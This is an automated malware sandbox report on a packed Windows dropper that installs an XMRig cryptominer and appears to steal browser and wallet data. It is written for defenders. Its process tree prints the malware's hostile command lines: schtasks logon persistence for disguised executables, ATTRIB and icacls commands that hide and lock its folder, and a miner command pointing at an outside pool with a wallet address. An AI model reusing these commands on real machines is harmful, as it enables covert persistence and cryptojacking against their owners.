xmrig | cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427

Resubmissions

28-02-2021 15:01

210228-5dd8sx9g26 10

28-02-2021 07:28

210228-xfflmbv19n 10

Analysis

max time kernel
60s
max time network
58s
platform
windows10_x64
resource
win10v20201028
submitted
28-02-2021 15:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe
Size

6.2MB
MD5

bd64d2e0d11093bbd84be2b6ca1c113d
SHA1

8fae8984391bd9dddb7afc0ebdd87a05954a7134
SHA256

cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427
SHA512

b2ebe1a566c9a22fa34795b5906721242a005b69cb1301ef6817ce31c45b9ca9da0e9b85c2973fe27a5910077c909469c91bf8a32bc8d370fdd84ce00415e3ad

Score

10^/10

xmrig discovery evasion miner spyware themida trojan

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

XMRig Miner Payload 8 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\1.exe	xmrig
C:\Users\Admin\AppData\Local\Temp\1.exe	xmrig
C:\Users\Admin\AppData\Roaming\1337\1.exe	xmrig
C:\Users\Admin\AppData\Roaming\1337\1.exe	xmrig
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe	xmrig
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe	xmrig
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe	xmrig
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe	xmrig

Executes dropped EXE 8 IoCs

Processes:

lxxxxxx.exe1.exeFile.exe1.exe@asasinalex.exedllhost.exeSecurityHealthTray.exeSecurityHealthTray.exe

pid process

1028 lxxxxxx.exe
212 1.exe
2992 File.exe
2412 1.exe
3996 @asasinalex.exe
2280 dllhost.exe
2240 SecurityHealthTray.exe
1316 SecurityHealthTray.exe

pid	process
1028	lxxxxxx.exe
212	1.exe
2992	File.exe
2412	1.exe
3996	@asasinalex.exe
2280	dllhost.exe
2240	SecurityHealthTray.exe
1316	SecurityHealthTray.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

SecurityHealthTray.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation	SecurityHealthTray.exe

Loads dropped DLL 1 IoCs

Processes:

File.exe

pid process

2992 File.exe
Modifies file permissions 1 TTPs 3 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exe

pid process

904 icacls.exe
3772 icacls.exe
2284 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
2992	File.exe

pid	process
904	icacls.exe
3772	icacls.exe
2284	icacls.exe

themida 1 IoCs

Detects Themida, Advanced Windows software protection system.

themida

Processes:

resource	yara_rule
behavioral1/memory/1152-2-0x0000000000210000-0x0000000000ECC000-memory.dmp	themida

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe

Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

9 api.ipify.org
10 api.ipify.org
11 ip-api.com
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe

pid process

1152 cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe

flow	ioc
9	api.ipify.org
10	api.ipify.org
11	ip-api.com

pid	process
1152	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe

Drops file in Program Files directory 2 IoCs

Processes:

lxxxxxx.exe

description	ioc	process
File created	C:\Program Files\Uninstall Information\sppsvc.exe	lxxxxxx.exe
File created	C:\Program Files\Uninstall Information\0a1fd5f707cd16ea89afd3d6db52b2da58214a6c	lxxxxxx.exe

Drops file in Windows directory 3 IoCs

Processes:

lxxxxxx.exe

description	ioc	process
File created	C:\Windows\BitLockerDiscoveryVolumeContents\System.exe	lxxxxxx.exe
File opened for modification	C:\Windows\BitLockerDiscoveryVolumeContents\System.exe	lxxxxxx.exe
File created	C:\Windows\BitLockerDiscoveryVolumeContents\27d1bcfc3c54e0e44ea423ffd4ee81fe73670a2a	lxxxxxx.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

NSIS installer 4 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\File.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\File.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\File.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\File.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

548 schtasks.exe
360 schtasks.exe
3924 schtasks.exe
936 schtasks.exe
488 schtasks.exe
3068 schtasks.exe
2040 schtasks.exe
2292 schtasks.exe
Modifies registry class 1 IoCs

Processes:

SecurityHealthTray.exe

description ioc process

Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance SecurityHealthTray.exe

pid	process
548	schtasks.exe
360	schtasks.exe
3924	schtasks.exe
936	schtasks.exe
488	schtasks.exe
3068	schtasks.exe
2040	schtasks.exe
2292	schtasks.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	SecurityHealthTray.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

@asasinalex.exelxxxxxx.exedllhost.exeSecurityHealthTray.exeSecurityHealthTray.exe

pid	process
3996	@asasinalex.exe
3996	@asasinalex.exe
1028	lxxxxxx.exe
2280	dllhost.exe
2240	SecurityHealthTray.exe
2240	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe
1316	SecurityHealthTray.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

@asasinalex.exelxxxxxx.exedllhost.exe

description pid process

Token: SeDebugPrivilege 3996 @asasinalex.exe
Token: SeDebugPrivilege 1028 lxxxxxx.exe
Token: SeDebugPrivilege 2280 dllhost.exe

description	pid	process
Token: SeDebugPrivilege	3996	@asasinalex.exe
Token: SeDebugPrivilege	1028	lxxxxxx.exe
Token: SeDebugPrivilege	2280	dllhost.exe

Suspicious use of WriteProcessMemory 50 IoCs

Processes:

cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe1.exeFile.execmd.execmd.exelxxxxxx.exeSecurityHealthTray.exe

description	pid	process	target process
PID 1152 wrote to memory of 1028	1152	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe	lxxxxxx.exe
PID 1152 wrote to memory of 1028	1152	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe	lxxxxxx.exe
PID 1152 wrote to memory of 212	1152	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe	1.exe
PID 1152 wrote to memory of 212	1152	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe	1.exe
PID 1152 wrote to memory of 2992	1152	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe	File.exe
PID 1152 wrote to memory of 2992	1152	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe	File.exe
PID 1152 wrote to memory of 2992	1152	cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe	File.exe
PID 212 wrote to memory of 488	212	1.exe	schtasks.exe
PID 212 wrote to memory of 488	212	1.exe	schtasks.exe
PID 212 wrote to memory of 2240	212	1.exe	cmd.exe
PID 212 wrote to memory of 2240	212	1.exe	cmd.exe
PID 212 wrote to memory of 736	212	1.exe	cmd.exe
PID 212 wrote to memory of 736	212	1.exe	cmd.exe
PID 212 wrote to memory of 1296	212	1.exe	cmd.exe
PID 212 wrote to memory of 1296	212	1.exe	cmd.exe
PID 2992 wrote to memory of 2412	2992	File.exe	1.exe
PID 2992 wrote to memory of 2412	2992	File.exe	1.exe
PID 2992 wrote to memory of 3996	2992	File.exe	@asasinalex.exe
PID 2992 wrote to memory of 3996	2992	File.exe	@asasinalex.exe
PID 2992 wrote to memory of 3996	2992	File.exe	@asasinalex.exe
PID 1296 wrote to memory of 904	1296	cmd.exe	icacls.exe
PID 1296 wrote to memory of 904	1296	cmd.exe	icacls.exe
PID 2240 wrote to memory of 3928	2240	cmd.exe	attrib.exe
PID 2240 wrote to memory of 3928	2240	cmd.exe	attrib.exe
PID 1296 wrote to memory of 3772	1296	cmd.exe	icacls.exe
PID 1296 wrote to memory of 3772	1296	cmd.exe	icacls.exe
PID 2240 wrote to memory of 2116	2240	cmd.exe	attrib.exe
PID 2240 wrote to memory of 2116	2240	cmd.exe	attrib.exe
PID 1296 wrote to memory of 2284	1296	cmd.exe	icacls.exe
PID 1296 wrote to memory of 2284	1296	cmd.exe	icacls.exe
PID 2240 wrote to memory of 2836	2240	cmd.exe	attrib.exe
PID 2240 wrote to memory of 2836	2240	cmd.exe	attrib.exe
PID 1028 wrote to memory of 3068	1028	lxxxxxx.exe	schtasks.exe
PID 1028 wrote to memory of 3068	1028	lxxxxxx.exe	schtasks.exe
PID 1028 wrote to memory of 2040	1028	lxxxxxx.exe	schtasks.exe
PID 1028 wrote to memory of 2040	1028	lxxxxxx.exe	schtasks.exe
PID 1028 wrote to memory of 2292	1028	lxxxxxx.exe	schtasks.exe
PID 1028 wrote to memory of 2292	1028	lxxxxxx.exe	schtasks.exe
PID 1028 wrote to memory of 548	1028	lxxxxxx.exe	schtasks.exe
PID 1028 wrote to memory of 548	1028	lxxxxxx.exe	schtasks.exe
PID 1028 wrote to memory of 360	1028	lxxxxxx.exe	schtasks.exe
PID 1028 wrote to memory of 360	1028	lxxxxxx.exe	schtasks.exe
PID 1028 wrote to memory of 3924	1028	lxxxxxx.exe	schtasks.exe
PID 1028 wrote to memory of 3924	1028	lxxxxxx.exe	schtasks.exe
PID 1028 wrote to memory of 936	1028	lxxxxxx.exe	schtasks.exe
PID 1028 wrote to memory of 936	1028	lxxxxxx.exe	schtasks.exe
PID 1028 wrote to memory of 2280	1028	lxxxxxx.exe	dllhost.exe
PID 1028 wrote to memory of 2280	1028	lxxxxxx.exe	dllhost.exe
PID 2240 wrote to memory of 1316	2240	SecurityHealthTray.exe	SecurityHealthTray.exe
PID 2240 wrote to memory of 1316	2240	SecurityHealthTray.exe	SecurityHealthTray.exe

Views/modifies file attributes 1 TTPs 3 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exeattrib.exe

pid process

3928 attrib.exe
2116 attrib.exe
2836 attrib.exe

pid	process
3928	attrib.exe
2116	attrib.exe
2836	attrib.exe

C:\Users\Admin\AppData\Local\Temp\cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe
"C:\Users\Admin\AppData\Local\Temp\cc53accc69b32c2507210ea70d1d56aa84dbe354a7f79577df180179ea797427.exe"
1⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:1152
- C:\Users\Admin\AppData\Local\Temp\lxxxxxx.exe
  "C:\Users\Admin\AppData\Local\Temp\lxxxxxx.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1028
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "System" /sc ONLOGON /tr "'C:\Windows\BitLockerDiscoveryVolumeContents\System.exe'" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:3068
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\sppsvc.exe'" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:2040
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Default\Downloads\OfficeClickToRun.exe'" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:2292
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "sppsvc" /sc ONLOGON /tr "'C:\PerfLogs\sppsvc.exe'" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:548
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\ProgramData\SecurityEssentials\fontdrvhost.exe'" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:360
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\ProgramData\Application Data\fontdrvhost.exe'" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:3924
- - C:\Windows\SYSTEM32\schtasks.exe
    "schtasks" /create /tn "dllhost" /sc ONLOGON /tr "'C:\Documents and Settings\dllhost.exe'" /rl HIGHEST /f
    3⤵
    - Creates scheduled task(s)
    PID:936
- - C:\Documents and Settings\dllhost.exe
    "C:\Documents and Settings\dllhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2280
- C:\Users\Admin\AppData\Local\Temp\1.exe
  "C:\Users\Admin\AppData\Local\Temp\1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:212
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN Windows\x86_microsoft-windows-fsrm-common_31bf3256ad364e35_10.0.18372.1_none_3fed101f25aae892\MicrosoftSecurityEssentials /XML "C:\ProgramData\SecurityEssentials\task.xml"
    3⤵
    - Creates scheduled task(s)
    PID:488
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials" & ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"& ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\task.xml"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2240
  - - C:\Windows\system32\attrib.exe
      ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials"
      4⤵
      Views/modifies file attributes
      PID:3928
  - - C:\Windows\system32\attrib.exe
      ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe"
      4⤵
      Views/modifies file attributes
      PID:2116
  - - C:\Windows\system32\attrib.exe
      ATTRIB +h +s +r "C:\ProgramData\SecurityEssentials\task.xml"
      4⤵
      Views/modifies file attributes
      PID:2836
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c DEL /F /Q C:\ProgramData\SecurityEssentials\task.xml
    3⤵
    PID:736
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "admin:(R,REA,RA,RD)"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1296
  - - C:\Windows\system32\icacls.exe
      icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
      4⤵
      Modifies file permissions
      PID:904
  - - C:\Windows\system32\icacls.exe
      icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
      4⤵
      Modifies file permissions
      PID:3772
  - - C:\Windows\system32\icacls.exe
      icacls "C:\ProgramData\SecurityEssentials" /inheritance:e /deny "admin:(R,REA,RA,RD)"
      4⤵
      Modifies file permissions
      PID:2284
- C:\Users\Admin\AppData\Local\Temp\File.exe
  "C:\Users\Admin\AppData\Local\Temp\File.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2992
- - C:\Users\Admin\AppData\Roaming\1337\1.exe
    "C:\Users\Admin\AppData\Roaming\1337\1.exe"
    3⤵
    - Executes dropped EXE
    PID:2412
- - C:\Users\Admin\AppData\Roaming\1337\@asasinalex.exe
    "C:\Users\Admin\AppData\Roaming\1337\@asasinalex.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3996

C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
1⤵
- Executes dropped EXE
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2240
- C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe
  "C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe" --max-cpu-usage=10 -o pool.supportxmr.com:3333 -u 41xymULmr9LRENCpbQbVtT37sg4GZWnwfTGfy8cdmLz9GPLs2zxvi4NDN1pCKuCu7ycHHHhphxpu7g4tv4BMZUgL1edwe2A -p x --rig-id={dbbebbebefe}
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:1316

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

System Information Discovery

T1082

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Documents and Settings\dllhost.exe

MD5
348865c449962bf4154b89d43640f4bb

SHA1
2079978d1f4a92402f5359c98b822f6587da9fce

SHA256
dbea34702c32688f055d9c56d3267a4d4da98adea992a7df123a2b3e8487018a

SHA512
bc72768c88759463cdd718c4f8bdb2f16cf8ef16bd0b6d4ee22ce16a3706a74dca583c3d95e6a5af7d4107ee456e25cbb601f70372ba15db4fba266251080778

Download Submit
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe

MD5
5a41d18564ec4ca307838f52c4d0efe2

SHA1
79eff9a4183fa29dbc641dd168175cfbfbdfe6c4

SHA256
fb2757df4ab16cd738f2438133a95b264293d5721e66ae9aba3c62360bd60800

SHA512
88afd3f8c042bf567c29a7efaf37b64241daa77bfbc6fc6ad52ccb34fef00afe973ff648923bab453a2a214da5e230bc4de3efee88206ddc3ca94b329a938605

Download Submit
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe

MD5
17ace3605b7d0deceb91d336e8180ec9

SHA1
99c95524a7567c5793ea7e3694f6fd259d9af8b3

SHA256
0a1625ce65d53934be9d03d8d292f520506407b5c7e073791d172f1102e7f4f1

SHA512
67e995df26f855a36a701bbcb407816cae393f26dc4d2a337b0bd1fa0ec6359098062ed2eed414a0efec1290db88e5dd0a7ff6014a73cbb4074553b84ca7c588

Download Submit
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe

MD5
b5ca9dfdf4963c87f5a001126e8a32b5

SHA1
0ca09c2ac2995c12b21766a3665978967c671ce3

SHA256
150e1133fda08a558c5b4652d5affea662b273b32106a065f0f5a0782f61640d

SHA512
9b434f751b318d468a3fbdf445cd51fb7cba27cee315ee12e28d71be1638ebc88bd2b3d13decfeb4aacb1d85529a622ebbed050ca71e64ff0911c924fbea481c

Download Submit
C:\ProgramData\SecurityEssentials\SecurityHealthTray.exe

MD5
a84bfc923c29bdcb2b3bd6f9d83172e2

SHA1
ff7188f7a16f3839e9301cdab7f5f37554b205c5

SHA256
c5c198648b06d10cafff1c446136e6ff7f7bff3ab2f6445077e3026827bc5bcd

SHA512
d066b154a5c6c6c89be46e2a4a8f8a026f5eb6bac5a8f1a76821c25486893ae0cdc0efbb79b12faf14a861c262abb636152949fa29304bf4f740eaaeed2c5879

Download Submit
C:\ProgramData\SecurityEssentials\task.xml

MD5
941e541b9eae61e8fea324eceae33077

SHA1
e66623f0f947cb6bf7a45f6f27b4f455101a4bdf

SHA256
faa950bbc214e278d197a385fa638c27b3e5c58928bb529f0310159125b8c501

SHA512
23c4bba1a67bf11602d382e64faa968e0d5eba0d165655cd2c6452c55bd6f3468e7214731ef89050882bb08538e495439dba53777cce0648e8d8fc96de783ccb

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe

MD5
ce8e8a32796ae98b7d11a2cfe5fd5b2b

SHA1
e6a823bb87767e165c8ef56a11bcd6f9c170de38

SHA256
b6f88899475f8027a5e8ead9bcc47e6e37f9edd3aa8fee0dc9707674e9dfc836

SHA512
37d2fa95e74cc396a74808964063075273c20883b116e2366498ecc30d36505ffd449abae524105ba6644863df862a230f98e380e4bde83a1a63161d522f3dd2

Download Submit
C:\Users\Admin\AppData\Local\Temp\1.exe

MD5
ce8e8a32796ae98b7d11a2cfe5fd5b2b

SHA1
e6a823bb87767e165c8ef56a11bcd6f9c170de38

SHA256
b6f88899475f8027a5e8ead9bcc47e6e37f9edd3aa8fee0dc9707674e9dfc836

SHA512
37d2fa95e74cc396a74808964063075273c20883b116e2366498ecc30d36505ffd449abae524105ba6644863df862a230f98e380e4bde83a1a63161d522f3dd2

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe

MD5
d287d60aaf019246a1a8c5db68b8f41a

SHA1
a25656c1abc938eaa3464ff45c305e89417b2c25

SHA256
f66d9c77d511503d6d7621198c1054650339a3e4ee49601d87e073e26905676b

SHA512
d344c80c19ac34e5158292ddb172fc18c861c63c5f4fb3ec842a90134425b98290b718a656c76369d9e931cbecf5718f8ca9c1b751b93592ce15feb99dc331a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\File.exe

MD5
d287d60aaf019246a1a8c5db68b8f41a

SHA1
a25656c1abc938eaa3464ff45c305e89417b2c25

SHA256
f66d9c77d511503d6d7621198c1054650339a3e4ee49601d87e073e26905676b

SHA512
d344c80c19ac34e5158292ddb172fc18c861c63c5f4fb3ec842a90134425b98290b718a656c76369d9e931cbecf5718f8ca9c1b751b93592ce15feb99dc331a4

Download Submit
C:\Users\Admin\AppData\Local\Temp\lxxxxxx.exe

MD5
348865c449962bf4154b89d43640f4bb

SHA1
2079978d1f4a92402f5359c98b822f6587da9fce

SHA256
dbea34702c32688f055d9c56d3267a4d4da98adea992a7df123a2b3e8487018a

SHA512
bc72768c88759463cdd718c4f8bdb2f16cf8ef16bd0b6d4ee22ce16a3706a74dca583c3d95e6a5af7d4107ee456e25cbb601f70372ba15db4fba266251080778

Download Submit
C:\Users\Admin\AppData\Local\Temp\lxxxxxx.exe

MD5
348865c449962bf4154b89d43640f4bb

SHA1
2079978d1f4a92402f5359c98b822f6587da9fce

SHA256
dbea34702c32688f055d9c56d3267a4d4da98adea992a7df123a2b3e8487018a

SHA512
bc72768c88759463cdd718c4f8bdb2f16cf8ef16bd0b6d4ee22ce16a3706a74dca583c3d95e6a5af7d4107ee456e25cbb601f70372ba15db4fba266251080778

Download Submit
C:\Users\Admin\AppData\Roaming\1337\1.exe

MD5
ce8e8a32796ae98b7d11a2cfe5fd5b2b

SHA1
e6a823bb87767e165c8ef56a11bcd6f9c170de38

SHA256
b6f88899475f8027a5e8ead9bcc47e6e37f9edd3aa8fee0dc9707674e9dfc836

SHA512
37d2fa95e74cc396a74808964063075273c20883b116e2366498ecc30d36505ffd449abae524105ba6644863df862a230f98e380e4bde83a1a63161d522f3dd2

Download Submit
C:\Users\Admin\AppData\Roaming\1337\1.exe

MD5
ce8e8a32796ae98b7d11a2cfe5fd5b2b

SHA1
e6a823bb87767e165c8ef56a11bcd6f9c170de38

SHA256
b6f88899475f8027a5e8ead9bcc47e6e37f9edd3aa8fee0dc9707674e9dfc836

SHA512
37d2fa95e74cc396a74808964063075273c20883b116e2366498ecc30d36505ffd449abae524105ba6644863df862a230f98e380e4bde83a1a63161d522f3dd2

Download Submit
C:\Users\Admin\AppData\Roaming\1337\@asasinalex.exe

MD5
4447f458a0cf3bedb38f5cf9897c998c

SHA1
b3975f5bf7273821190e038ef9a11a54c02b5760

SHA256
24b93292dc2cb37fa8b990a0e548fbfe5d2ea88fc3b0228808915f14c5e85e86

SHA512
76f62b747019b571534997025aa5d15fdd578493db584f54e71298cf3be9a19721720780712302b7d643d979f7cb539ea8ca68671a03f95a21bd1d0e8920b96a

Download Submit
C:\Users\Admin\AppData\Roaming\1337\@asasinalex.exe

MD5
4447f458a0cf3bedb38f5cf9897c998c

SHA1
b3975f5bf7273821190e038ef9a11a54c02b5760

SHA256
24b93292dc2cb37fa8b990a0e548fbfe5d2ea88fc3b0228808915f14c5e85e86

SHA512
76f62b747019b571534997025aa5d15fdd578493db584f54e71298cf3be9a19721720780712302b7d643d979f7cb539ea8ca68671a03f95a21bd1d0e8920b96a

Download Submit
C:\Users\dllhost.exe

MD5
348865c449962bf4154b89d43640f4bb

SHA1
2079978d1f4a92402f5359c98b822f6587da9fce

SHA256
dbea34702c32688f055d9c56d3267a4d4da98adea992a7df123a2b3e8487018a

SHA512
bc72768c88759463cdd718c4f8bdb2f16cf8ef16bd0b6d4ee22ce16a3706a74dca583c3d95e6a5af7d4107ee456e25cbb601f70372ba15db4fba266251080778

Download Submit
\Users\Admin\AppData\Local\Temp\nsn4E37.tmp\System.dll

MD5
0063d48afe5a0cdc02833145667b6641

SHA1
e7eb614805d183ecb1127c62decb1a6be1b4f7a8

SHA256
ac9dfe3b35ea4b8932536ed7406c29a432976b685cc5322f94ef93df920fede7

SHA512
71cbbcaeb345e09306e368717ea0503fe8df485be2e95200febc61bcd8ba74fb4211cd263c232f148c0123f6c6f2e3fd4ea20bdecc4070f5208c35c6920240f0

Download Submit
